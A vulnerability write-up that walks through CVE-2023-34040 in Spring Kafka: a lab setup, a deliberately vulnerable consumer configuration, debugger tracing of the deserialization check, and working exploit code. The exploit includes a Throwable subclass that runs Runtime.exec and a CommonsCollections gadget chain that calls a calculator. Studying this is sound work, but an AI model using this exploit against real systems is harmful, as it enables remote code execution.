CVE-2023-34040 Spring Kafka Deserialization Remote Code Execution

0x01 Preface

Here is the explicit description of the Spring Kafka deserialization vulnerability from the VMware security bulletin.


Reference

https://spring.io/security/cve-2023-34040

According to the description in the security bulletin, we can extract the critical preconditions for the vulnerability:

  1. The ErrorHandlingDeserializer is not configured for the key and/or value of the Kafka record.

  2. The boolean properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull are set to true.

  3. Users can publish messages to a Kafka topic without any verification.

0x02 Concepts of Kafka

Before diving deeply into the vulnerability, let us briefly review some relevant concepts of the Kafka service.


  • Producer: the object that publishes records to a Kafka topic is called the producer.

  • Topic: records are categorized by the Kafka service, and each category is called a topic.

  • Broker: published messages are stored in a group of servers called a Kafka cluster. Each of these servers is a broker. Consumers can fetch data from brokers and consume more than one topic.

  • Consumer: the object that subscribes to topics and processes the published messages is called the consumer. Message consumption is topic-based.

Moreover, it is necessary to review the structure of a Kafka record.


A Kafka record, also called a message or event, consists of a header and a body. The header data is essentially metadata, including basic elements such as the topic, partition, and timestamp, stored as key/value pairs. The body data is usually the relevant business data, stored as a key/value structure as well.
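
For instance, a producer-side record with one custom header could be built like this (topic, key, and values are illustrative only):

import java.nio.charset.StandardCharsets;

import org.apache.kafka.clients.producer.ProducerRecord;

// The body is a key/value pair; each header is a name plus a byte[] value.
ProducerRecord<String, String> record = new ProducerRecord<>("my-topic", "some-key", "some-value");
record.headers().add("trace-id", "42".getBytes(StandardCharsets.UTF_8));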

Preparation

A ZooKeeper server is required before deploying the Kafka service.

1. Installing the ZooKeeper server with Docker

docker run -d --name zookeeper -p 2181:2181 -t zookeeper:latest

2. Deploying the Kafka server with Docker

docker run  -d --name kafka -p 9092:9092 \
-e KAFKA_ZOOKEEPER_CONNECT=192.168.5.102:2181 \
-e KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://192.168.5.102:9092 \
-e KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 \
-e TZ="Asia/Shanghai" \
wurstmeister/kafka:latest

3. Importing the affected spring-kafka dependency into the Spring Boot project

Affected versions:

  • 2.8.1 to 2.9.10
  • 3.0.0 to 3.0.9
<dependency>
    <groupId>org.springframework.kafka</groupId>
    <artifactId>spring-kafka</artifactId>
    <version>2.8.11</version>
</dependency>

4. Updating the configuration in application.yaml

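A minimal sketch of the application.yaml for this demonstration, covering the two properties the consumer config class below reads (the address matches the Docker setup above; a real configuration may contain more entries):

spring:
  kafka:
    bootstrap-servers: 192.168.5.102:9092
    consumer:
      group-id: my-group-id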

5. Classes for the demonstration

1) Kafka Producer Class

package com.example.SpringKafkaDemo.producer;

import com.example.SpringKafkaDemo.model.KafkaMessage;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.*;

import java.util.HashMap;

@RestController
public class KafkaProducer {

    @Autowired
    private KafkaTemplate<String, String> kafkaTemplate;

    @PostMapping("/message/send")
    public String sendMessage(@RequestBody KafkaMessage message) {

        String topic = message.getTopic();
        String data = message.getData();

        HashMap<String, String> headers = message.getHeaders();

        ProducerRecord<String, String> producerRecord = new ProducerRecord<>(topic, data);
        for (String s : headers.keySet()) {
            if (s.equals("springDeserializerExceptionKey")) {
                // This header carries a hex-encoded serialized object, so decode
                // it to raw bytes instead of writing the string as-is.
                String exceptData = headers.get(s);
                byte[] exceptHandler = KafkaProducer.hexStringToBytes(exceptData);
                producerRecord.headers().add(s, exceptHandler);
                continue;
            }

            producerRecord.headers().add(s, headers.get(s).getBytes());
        }
        kafkaTemplate.send(producerRecord);
        String jsonString = "{\"code\":\"200\", \"status\":\"success\"}";

        return jsonString;
    }

    // Converts a hex string (two characters per byte) into a byte array.
    private static byte[] hexStringToBytes(String hexString) {

        byte[] exceptionMessage = new byte[hexString.length() / 2];
        for (int i = 0; i < exceptionMessage.length; i++) {
            exceptionMessage[i] = (byte) Integer.parseInt(hexString.substring(i * 2, i * 2 + 2), 16);
        }
        return exceptionMessage;
    }
}

By the way, this uses Spring's template pattern, familiar from classes such as JdbcTemplate and RestTemplate. In this demonstration, an injected KafkaTemplate instance named kafkaTemplate performs the send.

Highlight of the code fragment

private KafkaTemplate<String, String> kafkaTemplate;

2) Kafka Consumer Class

package com.example.SpringKafkaDemo.consumer;

import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.stereotype.Service;

@Service
public class KafkaConsumer {

    // The listener container invokes this method for every record on "my-topic".
    @KafkaListener(topics = "my-topic", groupId = "my-group-id")
    public void consume(String message) {
        System.out.println("Received message: " + message);
    }

}

3) Config Class for the Consumer

package com.example.SpringKafkaDemo.config;

import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.serializer.JsonDeserializer;

import java.util.HashMap;
import java.util.Map;

@Configuration
@EnableKafka
public class KafkaConsumerConfig {

    @Value("${spring.kafka.bootstrap-servers}")
    private String bootstrapServers;

    @Value("${spring.kafka.consumer.group-id}")
    private String groupId;

    @Bean
    public Map<String, Object> consumerConfigs() {
        Map<String, Object> props = new HashMap<>();
        props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, bootstrapServers);
        props.put(ConsumerConfig.GROUP_ID_CONFIG, groupId);
        props.put(ConsumerConfig.AUTO_OFFSET_RESET_CONFIG, "earliest");
        props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
        props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
        return props;
    }

    @Bean
    public ConsumerFactory<String, String> consumerFactory() {
        return new DefaultKafkaConsumerFactory<>(consumerConfigs());
    }

    @Bean
    public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
        ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
        factory.setConsumerFactory(consumerFactory());
        // The two properties that open the vulnerable code path.
        factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
        factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
        return factory;
    }
}

In accordance with the vulnerability description in the official bulletin, we set both the checkDeserExWhenKeyNull and checkDeserExWhenValueNull properties to true.

factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);

Set a breakpoint at the getExceptionFromHeader function and then start the server.


Step into the invokeIfHaveRecords function, where the record object will be deserialized.


Back to the getExceptionFromHeader function.


This function extracts the springDeserializerExceptionKey entry from record.headers() (its name is passed in via the headerName variable) and then delivers the header value to the byteArrayToDeserializationException function.

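Paraphrased from the pre-patch spring-kafka source (exact details vary by version), the logic is roughly:

// Simplified paraphrase of getExceptionFromHeader() before the fix.
Header header = record.headers().lastHeader(headerName);
if (header != null) {
    // The raw header bytes are handed straight to Java deserialization.
    return byteArrayToDeserializationException(logger, header.value());
}
return null;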

Step into the byteArrayToDeserializationException function.

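Its core is roughly the following (again a simplified paraphrase of the pre-patch source):

// Simplified paraphrase of byteArrayToDeserializationException() before the fix.
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data)) {

    private boolean first = true;

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        // Only the FIRST class in the stream is compared to the allow-list;
        // classes referenced by its fields are resolved without restriction.
        if (this.first && !desc.getName().equals(DeserializationException.class.getName())) {
            throw new IOException("Header does not contain a DeserializationException");
        }
        this.first = false;
        return super.resolveClass(desc);
    }
};
return (DeserializationException) ois.readObject();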

The resolveClass function is overridden to restrict arbitrary Java class deserialization. This kind of check is a common defense against Java deserialization vulnerabilities and appears in many projects, such as Apache Shiro and Fastjson.


Apparently, only the class org.springframework.kafka.support.serializer.DeserializationException can be deserialized directly. However, the check applies only to the first class in the stream: classes referenced by its fields, such as the Throwable cause, are resolved without restriction.


Step into the DeserializationException constructor. It takes four arguments, one of which is cause, a Throwable that is reconstructed when the exception is deserialized.

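From the spring-kafka source, the constructor signature is:

public DeserializationException(String message, byte[] data, boolean isKey, Throwable cause)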

Write a malicious class that inherits from the parent class Throwable, as sketched below.

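A minimal sketch of such a class (the class name and command are placeholders; the payload sits in a static initializer so that it runs as soon as the class is loaded):

public class CustomExceptionClass extends Throwable {

    // Executed when the class is initialized during deserialization of the cause.
    static {
        try {
            Runtime.getRuntime().exec("open -a calculator"); // macOS demo payload
        }
        catch (Exception ignored) {
        }
    }
}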

Eventually, fill the value of the springDeserializerExceptionKey key in the JSON data with the hex-encoded Java serialization of the exception, as sketched below. The remote code execution is triggered after sending the HTTP request.

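Generating that value could look like the following sketch (an assumption-laden illustration, not the exact PoC code): serialize a DeserializationException whose cause is the malicious class, then hex-encode the bytes so that hexStringToBytes() in the producer can decode them.

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import org.springframework.kafka.support.serializer.DeserializationException;

// Serialize the exception carrying the malicious Throwable as its cause.
DeserializationException payload =
        new DeserializationException("test", null, false, new CustomExceptionClass());
ByteArrayOutputStream bos = new ByteArrayOutputStream();
try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
    oos.writeObject(payload);
}

// Hex-encode the serialized bytes; the resulting string becomes the value of
// "springDeserializerExceptionKey" in the "headers" field of the JSON body.
StringBuilder hex = new StringBuilder();
for (byte b : bos.toByteArray()) {
    hex.append(String.format("%02x", b));
}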

In addition, a CommonsCollections gadget chain could be exploited as well. Thus, the malicious class could be constructed as follows.

package org.example.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class CustomExceptionClass extends Throwable {

    // CommonsCollections transformer chain executed in a static initializer block.

    static {
        // Reflectively builds Runtime.getRuntime().exec("open -a calculator").
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"open -a calculator"}) // macOS payload
        };

        Map<String, String> innerMap = new HashMap<>();
        innerMap.put("key", "value");

        Map<String, String> outerMap = TransformedMap.decorate(
                innerMap,
                null,
                new ChainedTransformer(transformers));

        // put() on the decorated map fires the transformer chain.
        outerMap.put("topic", "test");
    }
}
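
Because the transformer chain lives in a static initializer, it fires as soon as the consumer's ObjectInputStream loads CustomExceptionClass while resolving the cause field. This also means the malicious class and commons-collections must be resolvable on the consumer's classpath.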

Proof of Concept

https://github.com/pyn3rd/CVE-2023-34040